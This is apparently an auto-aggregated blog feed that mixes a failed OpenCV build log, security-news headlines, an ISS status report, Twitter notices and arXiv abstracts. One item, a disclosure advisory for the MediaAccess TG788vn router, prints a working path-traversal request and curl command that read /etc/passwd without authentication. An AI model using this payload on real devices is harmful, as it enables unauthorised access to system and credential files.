libwebp.dir\Debug\dec.obj libwebp.dir\Debug\dec_neon.obj libwebp.dir\Debug\dec_sse2.obj libwebp.dir\Debug\enc.obj libwebp.dir\Debug\enc_neon.obj libwebp.dir\Debug\enc_sse2.obj libwebp.dir\Debug\lossless.obj libwebp.dir\Debug\upsampling.obj libwebp.dir\Debug\upsampling_neon.obj libwebp.dir\Debug\upsampling_sse2.obj libwebp.dir\Debug\yuv.obj libwebp.dir\Debug\analysis.obj libwebp.dir\Debug\backward_references.obj libwebp.dir\Debug\config.obj libwebp.dir\Debug\cost.obj libwebp.dir\Debug\filter.obj libwebp.dir\Debug\histogram.obj libwebp.dir\Debug\iterator.obj libwebp.dir\Debug\picture.obj libwebp.dir\Debug\syntax.obj libwebp.dir\Debug\token.obj libwebp.dir\Debug\webpenc.obj libwebp.dir\Debug\muxedit.obj libwebp.dir\Debug\muxinternal.obj libwebp.dir\Debug\muxread.obj libwebp.dir\Debug\bit_reader.obj libwebp.dir\Debug\bit_writer.obj libwebp.dir\Debug\color_cache.obj libwebp.dir\Debug\filters.obj libwebp.dir\Debug\huffman.obj libwebp.dir\Debug\huffman_encode.obj libwebp.dir\Debug\quant_levels.obj libwebp.dir\Debug\quant_levels_dec.obj libwebp.dir\Debug\rescaler.obj libwebp.dir\Debug\thread.obj libwebp.dir\Debug\utils.obj libwebp.dir\Debug\/dec/alpha.c.obj libwebp.dir\Debug\/dec/frame.c.obj libwebp.dir\Debug\/dec/layer.c.obj libwebp.dir\Debug\/dec/quant.c.obj libwebp.dir\Debug\/dec/tree.c.obj libwebp.dir\Debug\/dec/vp8l.c.obj libwebp.dir\Debug\/enc/alpha.c.obj libwebp.dir\Debug\/enc/frame.c.obj libwebp.dir\Debug\/enc/layer.c.obj libwebp.dir\Debug\/enc/quant.c.obj libwebp.dir\Debug\/enc/tree.c.obj libwebp.dir\Debug\/enc/vp8l.c.obj libwebp.vcxproj -> C:\Users\Diego\Documents\OPENCV\build64\3rdparty\lib\Debug\libwebpd.lib FinalizeBuildStatus: Se eliminará el archivo "libwebp.dir\Debug\libwebp.tlog\unsuccessfulbuild". Aplicando tarea Touch a "libwebp.dir\Debug\libwebp.tlog\libwebp.lastbuildstate". Compilación del proyecto terminada "C:\Users\Diego\Documents\OPENCV\build64\3rdparty\libwebp\libwebp.vcxproj" (destinos predeterminados). El proyecto "C:\Users\Diego\Documents\OPENCV\build64\ALL_BUILD.vcxproj" (1) está compilando "C:\Users\Diego\Documents\OPENCV\build64\apps\annotation\opencv_annotation.vcxproj" (10) en el nodo 1 (destinos predeterminados). El proyecto "C:\Users\Diego\Documents\OPENCV\build64\apps\annotation\opencv_annotation.vcxproj" (10) está compilando "C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj" (11) en el nodo 1 (destinos pre determinados). El proyecto "C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj" (11) está compilando "C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\opencv_cudev.vcxproj" (12) en el nodo 1 (destinos predetermi nados). PrepareForBuild: Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\bin\Debug\". Creando directorio "opencv_cudev.dir\Debug\opencv_cudev.tlog\". InitializeBuildStatus: Se creará "opencv_cudev.dir\Debug\opencv_cudev.tlog\unsuccessfulbuild" porque se especificó "AlwaysCreate". CustomBuild: Building Custom Rule C:/Users/Diego/Documents/OPENCV/sources/modules/cudev/CMakeLists.txt CMake does not need to re-run because C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\CMakeFiles\generate.stamp is up-to-date. MakeDirsForCl: Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\Debug". Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\lib\Debug". ClCompile: C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\CL.exe /c /IC:\Users\Diego\Documents\OPENCV\sources\3rdparty\ippicv\unpack\ippicv_win\include /IC:\Users\Diego\Documents\OPENCV\build64 /IC:\Users\Diego \Documents\OPENCV\sources\modules\cudev\include /IC:\Users\Diego\Documents\OPENCV\sources\modules\cudev\src /IC:\Users\Diego\Documents\OPENCV\build64\modules\cudev /IC:\Users\Diego\Documents\OPENCV\sources\modules\core\in clude /I"C:\Program Files\NVIDIA GPU Computing Toolkit\CUDA\v7.5\include" /Zi /nologo /W4 /WX- /MP8 /Od /Ob0 /Oi /D WIN32 /D _WINDOWS /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _SCL_SECURE_NO_WARNINGS /D _DEBUG /D CVAPI_EXPORTS /D _VARIADIC_MAX=10 /D __OPENCV_BUILD=1 /D "CMAKE_INTDIR=\"Debug\"" /D CVAPI_EXPORTS /D _WINDLL /D _MBCS /Gm- /EHa /RTC1 /MDd /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /GR /Fo"opencv_cudev.dir\D ebug\" /Fd"C:\Users\Diego\Documents\OPENCV\build64\lib\Debug\opencv_cudev310d.pdb" /Gd /TP /wd4251 /wd4324 /wd4275 /wd4589 /wd4189 /wd4505 /errorReport:queue /bigobj C:\Users\Diego\Documents\OPENCV\sources\modules\cudev \src\stub.cpp stub.cpp Link: C:\Program Files (x86)\Microsoft Visual Studio 12.0\VC\bin\x86_amd64\link.exe /ERRORREPORT:QUEUE /OUT:"C:\Users\Diego\Documents\OPENCV\build64\bin\Debug\opencv_cudev310d.dll" /INCREMENTAL /NOLOGO /LIBPATH:"C:/Program File s/NVIDIA GPU Computing Toolkit/CUDA/v7.5/lib/x64" /LIBPATH:"C:/Program Files/NVIDIA GPU Computing Toolkit/CUDA/v7.5/lib/x64/Debug" kernel32.lib user32.lib gdi32.lib winspool.lib shell32.lib ole32.lib oleaut32.lib uuid.lib comdlg32.lib advapi32.lib C:\Users\Diego\Documents\OPENCV\sources\3rdparty\ippicv\unpack\ippicv_win\lib\intel64\ippicvmt.lib cudart.lib nppc.lib nppi.lib npps.lib cufft.lib "-LC:/Program Files/NVIDIA GPU Computing Toolki t/CUDA/v7.5/lib/x64" cudart.lib nppc.lib nppi.lib npps.lib cufft.lib /NODEFAULTLIB:libc /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:/Users/Diego/Documents/OPENCV/build64/bin/ Debug/opencv_cudev310d.pdb" /SUBSYSTEM:CONSOLE /TLBID:1 /DYNAMICBASE /NXCOMPAT /IMPLIB:"C:/Users/Diego/Documents/OPENCV/build64/lib/Debug/opencv_cudev310d.lib" /MACHINE:X64 /machine:x64 /debug /DLL opencv_cudev.dir\Debug \stub.obj LINK : warning LNK4044: opci¾n '/LC:/Program Files/NVIDIA GPU Computing Toolkit/CUDA/v7.5/lib/x64' no reconocida; omitida [C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\opencv_cudev.vcxproj] Creando biblioteca C:/Users/Diego/Documents/OPENCV/build64/lib/Debug/opencv_cudev310d.lib y objeto C:/Users/Diego/Documents/OPENCV/build64/lib/Debug/opencv_cudev310d.exp opencv_cudev.vcxproj -> C:\Users\Diego\Documents\OPENCV\build64\bin\Debug\opencv_cudev310d.dll FinalizeBuildStatus: Se eliminará el archivo "opencv_cudev.dir\Debug\opencv_cudev.tlog\unsuccessfulbuild". Aplicando tarea Touch a "opencv_cudev.dir\Debug\opencv_cudev.tlog\opencv_cudev.lastbuildstate". Compilación del proyecto terminada "C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\opencv_cudev.vcxproj" (destinos predeterminados). PrepareForBuild: Creando directorio "opencv_core.dir\Debug\opencv_core.tlog\". InitializeBuildStatus: Se creará "opencv_core.dir\Debug\opencv_core.tlog\unsuccessfulbuild" porque se especificó "AlwaysCreate". ComputeCustomBuildOutput: Creando directorio "C:\Users\Diego\Documents\OPENCV\build64\modules\core\CMakeFiles\cuda_compile.dir\src\cuda\Debug\". CustomBuild: Building NVCC (Device) object modules/core/CMakeFiles/cuda_compile.dir/src/cuda/Debug/cuda_compile_generated_gpu_mat.cu.obj nvcc fatal : Microsoft Visual Studio configuration file 'vcvars64.bat' could not be found for installation at 'C:/Program Files (x86)/Microsoft Visual Studio 12.0/VC/bin/../..' CMake Error at cuda_compile_generated_gpu_mat.cu.obj.cmake:206 (message): Error generating C:/Users/Diego/Documents/OPENCV/build64/modules/core/CMakeFiles/cuda_compile.dir/src/cuda/Debug/cuda_compile_generated_gpu_mat.cu.obj C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(170,5): error MSB6006: "cmd.exe" salió con el código 1. [C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj] Compilación del proyecto terminada "C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj" (destinos predeterminados) -- ERROR. Compilación del proyecto terminada "C:\Users\Diego\Documents\OPENCV\build64\apps\annotation\opencv_annotation.vcxproj" (destinos predeterminados) -- ERROR. Compilación del proyecto terminada "C:\Users\Diego\Documents\OPENCV\build64\ALL_BUILD.vcxproj" (destinos predeterminados) -- ERROR. ERROR al compilar. "C:\Users\Diego\Documents\OPENCV\build64\ALL_BUILD.vcxproj" (destino predeterminado) (1) -> "C:\Users\Diego\Documents\OPENCV\build64\apps\annotation\opencv_annotation.vcxproj" (destino predeterminado) (10) -> "C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj" (destino predeterminado) (11) -> "C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\opencv_cudev.vcxproj" (destino predeterminado) (12) -> (Link destino) -> LINK : warning LNK4044: opci¾n '/LC:/Program Files/NVIDIA GPU Computing Toolkit/CUDA/v7.5/lib/x64' no reconocida; omitida [C:\Users\Diego\Documents\OPENCV\build64\modules\cudev\opencv_cudev.vcxproj] "C:\Users\Diego\Documents\OPENCV\build64\ALL_BUILD.vcxproj" (destino predeterminado) (1) -> "C:\Users\Diego\Documents\OPENCV\build64\apps\annotation\opencv_annotation.vcxproj" (destino predeterminado) (10) -> "C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj" (destino predeterminado) (11) -> (CustomBuild destino) -> C:\Program Files (x86)\MSBuild\Microsoft.Cpp\v4.0\V120\Microsoft.CppCommon.targets(170,5): error MSB6006: "cmd.exe" salió con el código 1. [C:\Users\Diego\Documents\OPENCV\build64\modules\core\opencv_core.vcxproj] 1 Advertencia(s) 1 Errores Tiempo transcurrido 00:00:39.80 C:\Users\Diego\Documents\OPENCV\build64> —Reply to this email directly or view it on GitHub.

Source: Gmail -> IFTTT-> Blogger

[FD] Unauthenticated remote code execution in OpenMRS

[FD] Cross Site Scripting (XSS) & Cross Site Request Forgery (CSRF) in Crony Cronjob Manager Version 0.4.4

[FD] MediaAccess , unauthenticated file disclosure

Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall Author : Ahmed Sultan (0x4148) Email : 0x4148@gmail.com MediaAccess TG788vn with Cisco firewall http config is vulnerable to critical unauthenticated file disclosure flaw, POC Request: POST /scgi-bin/platform.cgi HTTP/1.1 Host: xx.xx.xx.xx Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Referer: http://ift.tt/1S45Rkw Connection: keep-alive Content-Type: application/x-www-form-urlencoded Content-Length: 164 button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00 Response: HTTP/1.0 200 OK Date: Sat, 01 Jan 2011 00:00:45 GMT Server: Embedded HTTP Server. Connection: close loic_ipsec:x:500:500:xauth:/:/bin/cli The juicy contents are found in the headers POC root@0x4148:~# curl "http://ift.tt/1S45Rkw" --data "button.login.home=Se%20connecter&Login.userAgent=0x4148Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../../../../../etc/passwd%00.htm" --insecure -i HTTP/1.0 200 OK Date: Sat, 01 Jan 2011 00:00:45 GMT Server: Embedded HTTP Server. Connection: close root:ROOT_PASSWORD:0:0:root:/:/bin/sh nobody:x:0:0:nobody:/nonexistent:/bin/false loic_ipsec:x:500:500:xauth:/:/bin/cli

Source: Gmail -> IFTTT-> Blogger

Microsoft WARNING — 'Use Windows 7 at Your Own Risk'

Someone is threatening Windows 7 users with a misleading warning. Guess who? Microsoft itself… Microsoft has just issued a clear warning saying Windows 7 users should remain on the aging operating system "at your own risk, at your own peril." But why particularly Windows 7 Users? Since Windows 7 runs on 55 percent of all the computers on the planet, Microsoft is worried that its


from The Hacker News http://ift.tt/1Z8sCs2
via IFTTT

ISS Daily Summary Report – 1/5/16

Kubik-6 Ebox Exchange:  Kelly unstowed the European Space Agency (ESA) Kubik-6 facility and exchanged the centrifuge and thermal eBoxes in preparation for the Kubik-6 commissioning.  He then performed an activation and checkout of the unit.  Kubik is a small controlled-temperature incubator / cooler used to study biological samples in a microgravity environment.  It is equipped with removable inserts designed for self-contained, automatic experiments using seeds, cells, or small animals.    Fluid Shifts Before, During and After Prolonged Space Flight and Their Association with Intracranial Pressure and Visual Impairment (Fluid Shifts):  Kelly and Kornienko continued their Return-45 (R-45) Fluid Shifts session today.  Kelly collected blood samples and placed those and Kornienko’s saliva, blood and urine samples into the Minus Eighty Degree Celsius Laboratory Freezer for ISS (MELFI).  Fluid Shifts is a joint NASA-Russian experiment that investigates the causes for severe and lasting physical changes to astronaut’s eyes. Because the headward fluid shift is a hypothesized contributor to these changes, reversing this fluid shift with a lower body negative pressure device is under investigation to support development of preventative measures against a lasting change in vision.   Extravehicular Mobility Unit (EMU) Loop Scrubs:  Kopra configured EMU suits 3005 and 3008 for loop scrubbing.  Once the scrubbing activity was complete, the associated hardware was reconfigured in order to perform iodination of Ion Filters for both suits.  A sample containing 250 mL of the water was obtained after the loop scrub activity to determine the effectiveness of the filtering.  A small portion of this water sample was utilized for a conductivity test onboard ISS and the remaining water will be sent to the ground for chemical analysis.   Dynamic Onboard Ubiquitous Graphics (DOUG) Review:  Peake and Kopra performed a review of DOUG Software in order to study translation and robotics operation paths for the upcoming Sequential Shunt Unit (SSU) Extravehicular Activity (EVA), which is scheduled to occur on January 15th.   Enhanced Caution and Warning System (ECWS) Onboard Training:  Kopra reviewed ECWS operations then practiced EVA Cuff Checklist procedures.   EVA Tool Build:  Peake built two separate brush tools in order to assist in cleaning and lubricating threads during the upcoming EVA.   Elektron Fault:  Elektron was activated this afternoon, however experienced a fault and shutdown soon after. The crew performed initial troubleshooting steps by inspecting the EDV for the presence of bubbles. The crew confirmed that the EDV was clean with only a few very small bubbles present.  A second attempt to activate Elektron was performed without success.  At the end of the crew day, the crew purged the Elektron and left it deactivated.  Another activation attempt will be performed within the next few days.  Elektron had been deactivated since December 24th for the high beta period.   Mobile Servicing System (MSS) Operations:  Yesterday, following translation of the Mobile Transporter (MT) to Worksite 2, robotics ground controllers maneuvered the Space Station Remote Manipulator System (SSRMS) to pick up the Special Purpose Dexterous Manipulator (SPDM) from Mobile Base System (MBS) Power and Data Grapple Fixture (PDGF) #2.  Overnight, while capturing the SPDM PDGF, a new Dual Stage Carriage Rates functionality was tested for carriage mechanism motion.  Also, SPDM Latch End Effector (LEE) Diagnostics were performed as well as SPDM Backup Drive Unit (BDU) checkouts required every 180 days.  The MSS was then maneuvered into position to start Robotic Refueling Mission (RRM) Task board #4 (TB4) operations which are being performed this afternoon.   Today’s Planned Activities All activities were completed unless otherwise noted. Fluid Shifts Checkout of antivirus scan results on SSC laptops and report KOSMOKARD. Setup. Initiation of 24-hour ECG recording Progress # 431 (DC1) transfers with IMS update US EVA – equipment gather for making “fireplace brush” and “toothbrush” tools US EVA –making of “fireplace brush” tool (wire brush) WRS – recirculation tank fill ОКР-1 fire extinguishers replacement in SM (2), DC1 (1), МRМ2 (1) ISS HAM – radio powerdown Replacement of thermal eBox as part of KUBIK 6 science PPS – KUBIK 6 setup US EVA – making of “toothbrush” tool Video equipment setup for shooting T2 Exercise JRNL – journal entry MATRYOSHKA-R. Lyulin -5 Hardware Indication Monitoring PCRF – connector checkout HABIT – video equipment setup Preparation for EMU cooling loop cleaning Checkout of camcorder settings for P/TV Video recording for TV channel Nauka 2.0 (Science 2.0) Initiation of EMU cooling loop cleaning Test activation of ВР and ЕСG monitors ПС1, ПС2 dust trap filters replacement in FGB (ТГК431ГрО_з1_К5. Removed – to disposal. Update IMS) Gas-Liquid mixture filter replacement in СРВК-2М HABIT – video recording termination WRS – Recirculation tank fill Maintenance activities on installation of cover sheets on SM interior panel 334 – 2nd day Water sampling post EMU cooling loop cleaning RET inspection for UA EVA Hardware setup for PAO MRM2 comm config for experiment COULOMB CRYSTAL. Experiment Run EMU cooling loop cleaning – iodination EMU – conductivity test Review of DOUG SW MRM2 Comm reconfig to nominal COULOMB CRYSTAL. Data copying and downlink VZAIMODEYSTVIE-2. Experiment Run Soyuz #719 Samsung tablet charge – initiation TOCA – calibration monitoring IMS update US EVA – ECWS training exercise KONTROL. Mode changing of “Indicator-ISS” scientific hardware CONTENT. Experiment ops Soyuz #719 Samsung tablet charge – termination EMU – cooling loop maintenance – EMU reconfig Elektron liquid tank БЖ repress prior to activation Elektron liquid tank БЖ repress prior to activation – handover Video recording for TV channel Nauka 2.0 (Science 2.0) HAM radio session from Columbus EMU – long drying WinSCAT activity Evening Work Prep SOZh Maintenance TOCA – calibration data recording monitoring Stowage of syringes used in Н2О conductivity test COGN – Experiment Run and questionnaire entry Reports preparation for Roskosmos website and social networks Video shooting for VGTRK channel EKON-M. Observation and photography   Completed Task List Items None   Ground Activities All activities were completed unless otherwise noted. Robotics Refueling Mission (RRM) Taskboard 4 Removal Operations   Three-Day Look Ahead: Wednesday, 01/06: Fluid Shifts Ultrasound, JEMAL depressurization/vent, EMU Resize, EVA ECWS OBT/Tether Inspection, Sprint setup Thursday, 01/07: […]

from ISS On-Orbit Status Report http://ift.tt/1RrLagN
via IFTTT

New Long-Range Wi-Fi Standard Offers Double Range to Home Devices

It is a common problem: Home Wireless Router's reach is terrible that the WiFi network even does not extend past the front door of the room. My house also has all kinds of Wi-Fi dead zones, but can we fix it? The answer is: YES. The problem will improve with a future, longer range version of Wi-Fi that uses low power consumption than current wireless technology and specifically targets


from The Hacker News http://ift.tt/1PJNhdW
via IFTTT

Anonymous: Praeambulum

Praeambulum. Of the Eleventh and Twelfth Tones in D Major. For Organ or Other Keyboard. B040Y028. Anonymous: Praeambulum. Pages of music: 2.

from Google Alert - anonymous http://ift.tt/1Jtjrek
via IFTTT

The Lagoon Nebula in Hydrogen Sulfur and Oxygen


The majestic Lagoon Nebula is filled with hot gas and the home for many young stars. Spanning 100 light years across while lying only about 5000 light years distant, the Lagoon Nebula is so big and bright that it can be seen without a telescope toward the constellation of the Archer (Sagittarius). Many bright stars are visible from NGC 6530, an open cluster that formed in the nebula only several million years ago. The greater nebula, also known as M8 and NGC 6523, is named "Lagoon" for the band of dust seen to the right of the open cluster's center. The featured image was taken in the light emitted by Hydrogen (shown in brown), Sulfur (red), and Oxygen (blue) and displayed in enhanced color. The featured picture is a newly processed panorama of M8, capturing twice the diameter of the Full Moon. Star formation continues in the Lagoon Nebula as witnessed by the many globules that exist there. via NASA http://ift.tt/1S1LYdR

Saltarello 'La Regina'

Saltarello 'La Regina' (Anonymous). Free public domain sheet music from IMSLP / Petrucci Music Library. Jump to: navigation, search ...

from Google Alert - anonymous http://ift.tt/1Jt7PYR'La_Regina'_(Anonymous)&ct=ga&cd=CAIyGjgxMzAxNTQ0ZWE3M2NhMmQ6Y29tOmVuOlVT&usg=AFQjCNE8gxBvxUpcVZVIFkcczeuFbACorQ
via IFTTT

Tuesday, January 5, 2016

I have a new follower on Twitter


Nick
I build a few web based products for a company in the tourism industry. My tweets are my own. No DMs please.
Mannheim, Germany
http://t.co/0CWcXnddHK
Following: 5489 - Followers: 6009

January 05, 2016 at 11:07PM via Twitter http://twitter.com/NickDinges

I have a new follower on Twitter


Marcus Retrac
The 1st SAP Hana Cloud provider to go production.Yeah, we have a good time!
Palo Alto
http://t.co/YeT6V9bIKs
Following: 453 - Followers: 377

January 05, 2016 at 10:22PM via Twitter http://twitter.com/Approyo

Artwork creation by a cognitive architecture integrating computational creativity and dual process approaches. (arXiv:1601.00669v1 [cs.AI])

The paper proposes a novel cognitive architecture (CA) for computational creativity based on the Psi model and on the mechanisms inspired by dual process theories of reasoning and rationality. In recent years, many cognitive models have focused on dual process theories to better describe and implement complex cognitive skills in artificial agents, but creativity has been approached only at a descriptive level. In previous works we have described various modules of the cognitive architecture that allows a robot to execute creative paintings. By means of dual process theories we refine some relevant mechanisms to obtain artworks, and in particular we explain details about the resolution level of the CA dealing with different strategies of access to the Long Term Memory (LTM) and managing the interaction between S1 and S2 processes of the dual process theory. The creative process involves both divergent and convergent processes in either implicit or explicit manner. This leads to four activities (exploratory, reflective, tacit, and analytic) that, triggered by urges and motivations, generate creative acts. These creative acts exploit both the LTM and the WM in order to make novel substitutions to a perceived image by properly mixing parts of pictures coming from different domains. The paper highlights the role of the interaction between S1 and S2 processes, modulated by the resolution level, which focuses the attention of the creative agent by broadening or narrowing the exploration of novel solutions, or even drawing the solution from a set of already made associations. An example of artificial painter is described in some experimentations by using a robotic platform.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1OyJIZb
via IFTTT

Weakly-supervised Disentangling with Recurrent Transformations for 3D View Synthesis. (arXiv:1601.00706v1 [cs.LG])

An important problem for both graphics and vision is to synthesize novel views of a 3D object from a single image. This is particularly challenging due to the partial observability inherent in projecting a 3D object onto the image space, and the ill-posedness of inferring object shape and pose. However, we can train a neural network to address the problem if we restrict our attention to specific object categories (in our case faces and chairs) for which we can gather ample training data. In this paper, we propose a novel recurrent convolutional encoder-decoder network that is trained end-to-end on the task of rendering rotated objects starting from a single image. The recurrent structure allows our model to capture long-term dependencies along a sequence of transformations. We demonstrate the quality of its predictions for human faces on the Multi-PIE dataset and for a dataset of 3D chair models, and also show its ability to disentangle latent factors of variation (e.g., identity and pose) without using full supervision.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1VGPwBe
via IFTTT

How do neurons operate on sparse distributed representations? A mathematical theory of sparsity, neurons and active dendrites. (arXiv:1601.00720v1 [q-bio.NC])

We propose a formal mathematical model for sparse representations in neocortex based on a neuron model and associated operations. The design of our model neuron is inspired by recent experimental findings on active dendritic processing and NMDA spikes in pyramidal neurons. We derive a number of scaling laws that characterize the accuracy of such neurons in detecting activation patterns in a neuronal population under adverse conditions. We introduce the union property which shows that synapses for multiple patterns can be randomly mixed together within a segment and still lead to highly accurate recognition. We describe simulation results that provide overall insight into sparse representations as well as two primary results. First we show that pattern recognition by a neuron can be extremely accurate and robust with high dimensional sparse inputs even when using a tiny number of synapses to recognize large patterns. Second, equations representing recognition accuracy of a dendrite predict optimal NMDA spiking thresholds under a generous set of assumptions. The prediction tightly matches NMDA spiking thresholds measured in the literature. Our model neuron matches many of the known properties of pyramidal neurons. As such the theory provides a unified and practical mathematical framework for understanding the benefits and limits of sparse representations in cortical networks.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1OLZ0p4
via IFTTT

Resource Sharing for Multi-Tenant NoSQL Data Store in Cloud. (arXiv:1601.00738v1 [cs.DC])

Multi-tenancy hosting of users in cloud NoSQL data stores is favored by cloud providers because it enables resource sharing at low operating cost. Multi-tenancy takes several forms depending on whether the back-end file system is a local file system (LFS) or a parallel file system (PFS), and on whether tenants are independent or share data across tenants. In this thesis I focus on and propose solutions to two cases: independent data-local file system, and shared data-parallel file system.

In the independent data-local file system case, resource contention occurs under certain conditions in Cassandra and HBase, two state-of-the-art NoSQL stores, causing performance degradation for one tenant by another. We investigate the interference and propose two approaches. The first provides a scheduling scheme that can approximate resource consumption, adapt to workload dynamics and work in a distributed fashion. The second introduces a workload-aware resource reservation approach to prevent interference. The approach relies on a performance model obtained offline and plans the reservation according to different workload resource demands. Results show the approaches together can prevent interference and adapt to dynamic workloads under multi-tenancy.

In the shared data-parallel file system case, it has been shown that running a distributed NoSQL store over PFS for shared data across tenants is not cost effective. Overheads are introduced due to the unawareness of the NoSQL store of PFS. This dissertation targets the key-value store (KVS), a specific form of NoSQL stores, and proposes a lightweight KVS over a parallel file system to improve efficiency. The solution is built on an embedded KVS for high performance but uses novel data structures to support concurrent writes. Results show the proposed system outperforms Cassandra and Voldemort in several different workloads.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1OyJHVa
via IFTTT

Learning Preferences for Manipulation Tasks from Online Coactive Feedback. (arXiv:1601.00741v1 [cs.RO])

We consider the problem of learning preferences over trajectories for mobile manipulators such as personal robots and assembly line robots. The preferences we learn are more intricate than simple geometric constraints on trajectories; they are rather governed by the surrounding context of various objects and human interactions in the environment. We propose a coactive online learning framework for teaching preferences in contextually rich environments. The key novelty of our approach lies in the type of feedback expected from the user: the human user does not need to demonstrate optimal trajectories as training data, but merely needs to iteratively provide trajectories that slightly improve over the trajectory currently proposed by the system. We argue that this coactive preference feedback can be more easily elicited than demonstrations of optimal trajectories. Nevertheless, theoretical regret bounds of our algorithm match the asymptotic rates of optimal trajectory algorithms.

We implement our algorithm on two high degree-of-freedom robots, PR2 and Baxter, and present three intuitive mechanisms for providing such incremental feedback. In our experimental evaluation we consider two context rich settings -- household chores and grocery store checkout -- and show that users are able to train the robot with just a few feedbacks (taking only a few minutes).\footnote{Parts of this work has been published at NIPS and ISRR conferences~\citep{Jain13,Jain13b}. This journal submission presents a consistent full paper, and also includes the proof of regret bounds, more details of the robotic system, and a thorough related work.}

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1VGPwBc
via IFTTT

Open challenges in understanding development and evolution of speech forms: The roles of embodied self-organization, motivation and active exploration. (arXiv:1601.00816v1 [cs.AI])

This article discusses open scientific challenges for understanding development and evolution of speech forms, as a commentary to Moulin-Frier et al. (Moulin-Frier et al., 2015). Based on the analysis of mathematical models of the origins of speech forms, with a focus on their assumptions , we study the fundamental question of how speech can be formed out of non--speech, at both developmental and evolutionary scales. In particular, we emphasize the importance of embodied self-organization , as well as the role of mechanisms of motivation and active curiosity-driven exploration in speech formation. Finally , we discuss an evolutionary-developmental perspective of the origins of speech.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1VGPuJs
via IFTTT

Joint learning of ontology and semantic parser from text. (arXiv:1601.00901v1 [cs.AI])

Semantic parsing methods are used for capturing and representing semantic meaning of text. Meaning representation capturing all the concepts in the text may not always be available or may not be sufficiently complete. Ontologies provide a structured and reasoning-capable way to model the content of a collection of texts. In this work, we present a novel approach to joint learning of ontology and semantic parser from text. The method is based on semi-automatic induction of a context-free grammar from semantically annotated text. The grammar parses the text into semantic trees. Both, the grammar and the semantic trees are used to learn the ontology on several levels -- classes, instances, taxonomic and non-taxonomic relations. The approach was evaluated on the first sentences of Wikipedia pages describing people.

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1OyJHV2
via IFTTT

PlanIt: A Crowdsourcing Approach for Learning to Plan Paths from Large Scale Preference Feedback. (arXiv:1406.2616v3 [cs.RO] UPDATED)

We consider the problem of learning user preferences over robot trajectories for environments rich in objects and humans. This is challenging because the criterion defining a good trajectory varies with users, tasks and interactions in the environment. We represent trajectory preferences using a cost function that the robot learns and uses it to generate good trajectories in new environments. We design a crowdsourcing system - PlanIt, where non-expert users label segments of the robot's trajectory. PlanIt allows us to collect a large amount of user feedback, and using the weak and noisy labels from PlanIt we learn the parameters of our model. We test our approach on 122 different environments for robotic navigation and manipulation tasks. Our extensive experiments show that the learned cost function generates preferred trajectories in human environments. Our crowdsourcing system is publicly available for the visualization of the learned costs and for providing preference feedback: \url{this http URL}

Donate to arXiv



from cs.AI updates on arXiv.org http://ift.tt/1oSlsSu
via IFTTT